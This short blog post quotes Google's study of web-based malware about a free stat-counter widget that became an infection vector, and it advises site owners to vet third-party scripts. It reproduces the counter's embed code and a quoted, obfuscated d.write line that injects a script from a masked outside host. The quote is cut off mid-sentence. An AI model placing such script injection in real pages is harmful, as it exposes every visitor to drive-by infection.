Google's malware study includes stat counter provider

Google released an interesting study (PDF) about web-based malware and of course one shady counter company is mentioned in the paper. I am not sure which company this is (m1.sta.xx  or http://m1.stats4u.yy ) , but always keep in mind to double check the third-party code on a regular basis. Also make sure to join one of the larger counter companies, that are in the market for some time ( e.g. by typing in their URL in webarchive.org). "Example of a widget that allows a third-party to insert arbitrary content into a web page. This widget used to keep statistics of the number of visitors since 2002 until it was turned into a malware infection vector in 2006:

<!-- Begin Stat Basic code --> <script language="JavaScript" src="http://m1.stat.xx/basic.js"> </script><script language="JavaScript"> <!-- statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0); // --> </script> <noscript> <a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA"> <img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA" border="0" nosave width="18" height="18"></a></noscript> <!-- End Stat Basic code -->

While examining our historical data, we detected a web page that started linking to a free statistics counter in June 2002 and was operating fine until sometime in 2006, when the nature of the counter changed and instead of cataloging the number of visitors, it started to exploit every user visiting pages linked to the counter. In this example, the now malicious JavaScript first records the presence of the following external systems: Shockwave Flash, Shockwave for Director, RealPlayer, QuickTime, VivoActive, LiveAudio, VRML, Dynamic HTML Binding, Windows Media Services. It then outputs another piece of JavaScript to the main page: d.write("<scr"+"ipt language=’JavaScript’

d.write("<scr"+"ipt language=’JavaScript’ type=’text/javascript’ src=’http://m1.stats4u.yy/md.js?country=us&id="+ id + "&_t="+(new Date()).getTime()+"’></scr"+"ipt>") This in turn triggers another wave of implicit dow

found by 10e20